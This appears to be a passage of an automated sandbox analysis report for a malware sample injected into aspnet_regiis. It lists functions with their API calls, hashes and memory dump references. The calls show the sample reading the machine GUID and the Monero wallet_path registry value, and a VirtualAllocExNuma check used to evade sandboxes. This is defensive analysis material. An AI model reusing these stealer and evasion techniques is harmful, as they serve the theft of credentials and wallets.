                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                    • String ID: LzA
                                                                                                                                                                    • API String ID: 1546541418-1388989900
                                                                                                                                                                    • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                    • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                                                                    • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                    • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                                                                    Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                                    • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                                      • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: OpenProcess_memmove_memset
                                                                                                                                                                    • String ID: N0ZWFt
                                                                                                                                                                    • API String ID: 2647191932-431618156
                                                                                                                                                                    • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                    • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                                                                    • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                    • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                                                                    Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                    • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                    • String ID: V@
                                                                                                                                                                    • API String ID: 2311089104-383300688
                                                                                                                                                                    • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                    • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                                                                    • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                    • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                                                                    Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00411607
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                    • API String ID: 2235053359-1211650757
                                                                                                                                                                    • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                    • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                                                                    • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                    • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                                                                    Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                    Strings
                                                                                                                                                                    • wallet_path, xrefs: 00401A9C
                                                                                                                                                                    • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                    • API String ID: 3466090806-4244082812
                                                                                                                                                                    • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                    • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                                                                    • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                                                                    Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                    • API String ID: 3466090806-2517555085
                                                                                                                                                                    • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                    • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                                    • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                                    Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                    • API String ID: 3466090806-1022791448
                                                                                                                                                                    • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                    • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                                    • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                    • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                                    Function 0041566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004156A4
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3891774339-0
                                                                                                                                                                    • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                    • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                                    • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                                    Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                    • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                    • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 181426013-0
                                                                                                                                                                    • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                                    • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                                    • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                                                                    Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                    • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1859398019-0
                                                                                                                                                                    • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                    • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                                                                    • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                    • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
